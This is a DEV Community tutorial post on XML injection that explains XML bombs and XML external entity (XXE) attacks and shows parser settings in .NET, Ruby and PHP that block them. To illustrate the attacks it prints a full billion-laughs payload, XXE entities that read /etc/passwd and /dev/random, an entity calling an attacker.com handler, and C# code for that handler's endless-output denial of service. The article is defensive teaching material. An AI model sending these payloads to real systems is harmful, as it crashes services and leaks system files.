DEV Community

Cover image for Web Services Security: XML Injection
Muhammad Ahmad
Muhammad Ahmad

Posted on

Web Services Security: XML Injection

What is XML: definition and further details

XML stands for eXtensible Markup Language, a derivative of SGML (upon which HTML is also based) and used to represent structured data objects as human-readable text. XML is designed as a format for the storage and transmission of data. XML is customizable (extensible) so that it can be tailored for any application by defining how data is organized and represented.

Here's an example of a simple XML file:

<?xml version="1.0" encoding="UTF-8"?>
<message>
  <to>receiver</to>
  <from>sender</from>
  <body>data</body>
</message>
Enter fullscreen mode Exit fullscreen mode

The first line of the text file identifies the file as an XML document and declares that it is encoded as Unicode “UTF-8” characters. As a best practice, every XML file should begin with such an identification though it's not strictly required.

All applications should use a standard parser library to consume XML text like this example. The parser converts constructed text file streams into a tree structure representation of the data that abstracts away the syntactic details of the source for the application to process directly. For the example above, an XML parser would create a data structure as shown below:

xml ds

Using the tree structure, software can easily identify the root element (message) and that it is well-formed having the three expected sub-elements, each with its corresponding text value available for processing.

Applications use XML as a handy data format for all manner of custom data representations, as well as a number of standard formats that are designed on top of XML. Put in mind that when handling any of the following kinds of data (and many more than can be listed here, as well) that under the covers an XML parser is likely running and hence these security issues may very well apply.

As well, there're many other data formats that are based on XML including but not limited to:

  • SOAP
  • .NET configuration files
  • Websphere trace files
  • WDSL
  • RSS
  • SVG

XML Injection Attacks: Common Types

The following attacks described are applicable to any application that parses XML input.
Specifically, the attacker creates malformed XML that the application consumes with the intention of tricking the XML parser to cause some harmful action.
XML parsers with bugs, or that are misconfigured and hence vulnerable to manipulation, are generally susceptible to two kinds of attacks:

  • XML Bombs (Billion laughs attack): The XML parser may crash or execute incorrectly given certain input data, resulting in a Denial of Service attack.
  • XXE Disclosure (XML external entity): The XML parser may mistakenly leak sensitive information.

Keep in mind that attacks may utilize perfectly valid XML, or possibly malformed XML (unless the parser strictly detects and rejects it safely).

XML Bomb Attack

An XML Bomb may be valid XML, but is designed so as to cause the XML parser, or the application processing its output, to hang or crash executing.
For example, consider the Billion Laughs Attack that consists of a short XML file that manages to expand under XML parsing into some 3 gigabytes of data. The large resultant data typically crashes any application, and it is easy to see how the data size could be scaled arbitrarily larger.

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
Enter fullscreen mode Exit fullscreen mode

Another example of a similar attack is the Quadratic Blowup Attack, which can also quickly expand to 2.5 gigabytes.

The “...” symbol replaces more repetitions below.

<?xml version="1.0"?>
<!DOCTYPE kaboom [
  <!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>
Enter fullscreen mode Exit fullscreen mode

Mitigating XML Bombs

The best way to avoid XML Bombs is for the application to configure the XML parser to disable inline expansion of entities. Without inline expansion the size increase will not be available to the attacker and these attacks will be rendered harmless.
When the application requires entity expansion, or if the XML parser does not provide this configuration option, set the parser to enforce a limit on the size of expanded entities.
Here is sample code for the standard .NET 4.0 XML parser to disable inline DTDs:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
XmlReader reader = XmlReader.Create(stream, settings);
Enter fullscreen mode Exit fullscreen mode

With this configuration, either of the XML Bombs would not result in excessive memory consumption.
Instead of the gigabytes of data, the data structure would show the structure of the entity expansion as it is expressed in the source XML.

If the application needed the expanded form of the relevant entity it would have to construct it directly and in the process have the appropriate checks to avoid causing the Denial of Service itself.

With the entity size limited, if an XML Bomb were parsed it would exceed this limit and the XML parser would throw an exception instead of causing a Denial of Service. Naturally, the limit must be set such that it does not impair useful functionality of valid uses.
Here's an example in Ruby's REXML parser:

REXML::Document.entity_expansion_limit = 0
Enter fullscreen mode Exit fullscreen mode

No entity expansion will be permitted with this configuration since the resulting size would exceed zero.

XML External Entity (XXE) Attacks

One feature of XML that can be used to attack an application is the external entity. By providing an XML input containing a reference to an external entity an attacker can cause the XML parser to read the referenced data and process it into the resultant XML data. The XML External Entity is a way for values replacement to be pulled from external URIs so it can potentially access files as well as network resources. If there is a pathway to expose the resulting data the attacker can manage to ex-filtrate the data by exploiting the access privileges of the XML parser process. Alternatively, by referencing a very large data source this can also lead to Denial of Service.

For example, consider an XML input that references the file /dev/random, a file stream of pseudorandom bytes that is endless (specifically, successive reading of random bytes will block when the system entropy pool is drained, resupplying more data when entropy is built back up). Since an XML parser will read data from the external entity until end-of-file, it will endlessly consume and construct data eventually overloading the system to failure.

<!ENTITY xxe SYSTEM "file:///dev/random" >
Enter fullscreen mode Exit fullscreen mode

An example of information disclosure could be an XML input that references the file /etc/passwd, the file of user logon information in classic Unix systems.
Modern systems no longer store password information but this file potentially contains user names and private contact information.

<!ENTITY xxe SYSTEM "file:///etc/passwd" >
Enter fullscreen mode Exit fullscreen mode

In the following example, we see how an attacker can achieve Denial of Service through an XXE attack. In this case, the XXE entity is replaced by the result of executing dos.ashx. As we can see below, the dos.ashx program produces output in an infinite loop, so the XXE entity will keep growing indefinitely.
If, in addition to that infinite loop, an attacker manages to execute the program dos.ashx on another machine, then the DoS will affect that machine as well.

ASHX file extension is an ASP.NET Web Handler file that often holds references to other web pages used in an ASP.NET web server application.

<!ENTITY xxe SYSTEM "http://www.attacker.com/dos.ashx" >
Enter fullscreen mode Exit fullscreen mode
// dos.ashx
public void ProcessRequest(HttpContext context) {
  context.Response.ContentType = "text/plain";
  byte[] data = new byte[1000000];

  for (int i = 0; i<data.Length; i++)
    data[i] = (byte)’A’;
  while (true) {
    context.Response.OutputStream.Write(data, 0, data.Length);
    context.Response.Flush();
  }
}

Enter fullscreen mode Exit fullscreen mode

Mitigating XXE Attacks

The easiest way is to configure the XML parser to avoid resolving external references entirely, here two examples in .Net 4.0 and PHP:

XmlReaderSettings settings = new XmlReaderSettings();
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);
Enter fullscreen mode Exit fullscreen mode
libxml_disable_entity_loader(true);
Enter fullscreen mode Exit fullscreen mode

Of course, XML external entities can be useful or even essential, in which case completely disabling the feature is not an acceptable solution. In these cases consider configuring, or if necessary, modifying the XML parser in order to apply one or more of these strategies:

  • Enforce a timeout to prevent delaying or very large data volume attacks.
  • Limit the type and amount of data that can be retrieved.
  • Restrict the XmlResolver from retrieving resources on the local host.

Conclusion:

XML attacks happen when an application that parses specially-crafted XML input causes harm.
Two well-known attacks are XML Bombs (Denial of Service), and XXE or XML External Entity (information disclosure or Denial of Service).
The preferred mitigation is the configuration of the XML parser to disable or at least safely limit the features of XML that cause these problems as described above. When configuration is not sufficient, the XML parser needs modification but this is a more risky and labor intensive method.

Discussion (0)